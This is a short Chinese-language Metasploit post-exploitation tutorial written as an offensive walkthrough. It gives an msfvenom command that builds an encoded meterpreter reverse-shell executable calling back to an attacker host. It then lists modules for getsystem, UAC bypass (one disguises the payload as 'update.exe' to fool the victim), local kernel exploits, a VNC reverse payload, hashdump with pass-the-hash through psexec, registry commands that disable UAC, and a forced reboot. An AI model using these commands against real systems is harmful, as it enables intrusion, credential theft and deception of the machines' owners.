msf后渗透

主要内容

首先构造一个payload

 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe

已经找到一台机器执行了我的payload

进一步获取更高的权限。

获取system权限

load priv
getsystems

执行出现超时
先返回msf，保留session

background

绕过UAC限制

1.可以使用如下模块

use exploit/windows/local/ask 

看一下需要配置项

这个模块需要基于已有的session，然后进一步请求客户端执行我们的shell。

设置名称以欺骗客户端执行

set filename update.exe //一般会看到更新后点击确认
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.8
set session 3 

exploit执行会在客户机弹出执行update.exe的弹窗，一旦执行，直接获取更高的shell。

这样就获得了更高权限的shell.但是这种客户机的主人一般不会这么傻到直接运行有shell的程序。

2.还可以使用如下模块

use exploit/windows/local/bypassuac  ///需要获取sehll用户组在管理员组

这个模块的用法和前面的类似，但是它是上传了包含绕过uac的程序，并不会在客户机的屏幕上弹出框。

3.还可以用如下模块

use exploit/windows/local/bypassuac_injection  //需要获取sehll用户组在管理员组

这个同样是不会弹出框，直接内部执行。

4.利用漏洞拿到system

use exploit/windows/local/ms13_053_schlamperei 
use exploit/windows/local/ms13_081_track_popup_menu 
use exploit/windows/local/ms13_097_ie_registry_symlink 
use exploit/windows/local/ppr_flatten_rec 

上面的四个都是提取system的漏洞利用模块。

第1个和第二个有windows版本的要求，为windows SP0或者SP1

注：其实不必这么麻烦，如果能Meterpreter直接迁移到系统的进程里，可以直接执行系统命令的
图形化界面payload

set payload windows/vncinject/reverse_tcp 
set ViewOnly no //可操作

hashdump

hashdump用来获取系统账户的用户名和密码的哈希值。

利用 exploit/windows/smb/psexec模块和hash后的密码登陆smb服务得到shell

use  exploit/windows/smb/psexec

配置参数：

set smbpass hashdump(得到的hash值）

set smbuser guest

利用之前的最高shell关掉UAC(用户账户控制），执行如下两条命令

 cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft \Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f 

 cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft \Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f 

//在shell的窗口下执行，不是meterpreter命令符下
参数说明
ADD 添加一个注册表项
-v 创建键值
-t 键值类型
-d 键值的值

重启使注册表内容生效

shutdown /r /t 0

run拿到shell